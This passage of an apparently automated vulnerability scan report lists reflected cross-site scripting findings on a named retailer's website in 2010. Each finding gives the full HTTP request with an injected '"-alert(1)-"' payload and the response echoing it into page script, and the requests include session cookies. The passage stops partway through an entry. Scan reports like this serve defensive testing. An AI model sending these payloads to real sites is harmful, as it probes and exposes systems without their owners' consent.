<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/");
//]]>
...[SNIP]...

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d11e"-alert(1)-"b8edafd3dcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mnmvr8jjf8lmeu2ltp2of88na0; expires=Tue, 09-Nov-2010 17:19:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1");
//]]>
...[SNIP]...

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b961f"-alert(1)-"fcdca4ddcf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s13ojrvlg1gobuv19o3vi9155; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/");
//]]>
...[SNIP]...

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27cbb"-alert(1)-"bdf6fdec2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8k235i9lhgm9jn9sgh3r21dfa7; expires=Tue, 09-Nov-2010 17:15:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/");
//]]>
...[SNIP]...

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c68"-alert(1)-"27abae530fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tid48jmod097u2stfo0nd2a5e2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/");
//]]>
...[SNIP]...

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5f1"-alert(1)-"ac5226bfd92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mi7u875n0j1fti1hbijatf3m3; expires=Tue, 09-Nov-2010 17:14:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1");
//]]>
...[SNIP]...

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00fd"-alert(1)-"1af4778c88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=evuojm770mansedc0kpbmgaum1; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/");
//]]>
...[SNIP]...

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eebd"-alert(1)-"d37ff8bf82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9br5o47e55n53418d1e1jtmcq2; expires=Tue, 09-Nov-2010 17:20:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/");
//]]>
...[SNIP]...

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa892"-alert(1)-"6112ce3a2d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=47h3pa66t9h7jtmvakhcjfjb07; expires=Tue, 09-Nov-2010 17:20:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/");
//]]>
...[SNIP]...

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee8d"-alert(1)-"5f12871407c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=52n4f0jpe4h3s6c7f3eki0h7b2; expires=Tue, 09-Nov-2010 17:18:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1");
//]]>
...[SNIP]...

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125f5"-alert(1)-"339b310c262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s8g9vok5absmav3sjkv3m79d95; expires=Tue, 09-Nov-2010 17:15:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/");
//]]>
...[SNIP]...

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c00d"-alert(1)-"3d2b6026ddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mc5c6ge65unqhrcrhbm1lg3g5; expires=Tue, 09-Nov-2010 17:15:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/");
//]]>
...[SNIP]...

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76af3"-alert(1)-"e9741ad8f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i83m7vgo6klbkt13pvu7ha0sf3; expires=Tue, 09-Nov-2010 17:15:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/");
//]]>
...[SNIP]...

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ea62"-alert(1)-"7d2c500e6f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rc2pet95p1bot5enhh22lhvkg2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> new-sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1");
//]]>
...[SNIP]...

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

